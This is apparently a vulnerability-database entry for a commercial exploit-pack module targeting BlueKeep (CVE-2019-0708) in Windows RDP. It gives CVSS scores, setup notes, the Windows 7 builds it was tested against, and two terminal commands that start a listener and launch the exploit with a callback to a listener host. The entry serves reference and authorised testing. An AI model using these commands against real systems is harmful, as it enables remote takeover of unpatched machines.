9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
Name | BLUEKEEP |
---|---|
CVE | CVE-2019-0708 Exploit Pack |
VENDOR: Microsoft | |
NOTES: | |
-- IMPORTANT â | |
The module is currently in beta stage. |
If you do not select âAllow remote code executionâ from the moduleâs dialog
it will simply test to see if the target is vulnerable (safe).
This module requires asn1tools to be installed (python) and can only run
on Linux hosts for now (due to our use of ctypes).
prompt-toolkit is an internal dependency of asn1tools, make sure to have a version
on the 2.x branch, ideally 2.0.9. Any version on the 1.x branch should generate errors.
Our linux_installer has been updated to take care of these new dependencies.
Tested against:
- Windows 7 Ultimate N (x86) [SP1 only]
- Windows 7 Ultimate (x64) with 2, 4/8 GB of RAM [SP1 only]
- Windows 7 Enterprise (x64) with 2, 4/8 GB of RAM [SP1 only]
- Windows 7 Professional (x64) with 4GB of RAM [SP1 only]
In this new release we have included the ability to specify the amount of RAM for
the target system which highly improves reliability and speed. This option is of
course optional, the module is fine-tuned as it is for what reported under
âTested againstâ. An incorrect value specified for the amount RAM can cause a BSOD
on the target system.
An updated version of the exploit will soon handle more Windows versions.
To get a node on the CLI:
[TERMINAL #1]$ ./commandlineInterface.py -v 17 -p 5555
[TERMINAL #2]$ python2 exploits/remote/windows/BLUEKEEP/BLUEKEEP.py -t 192.168.1.9 -l 192.168.1.10 -d 5555
Repeatability:
Date public:
CVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0708
CVSS: 10.0
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C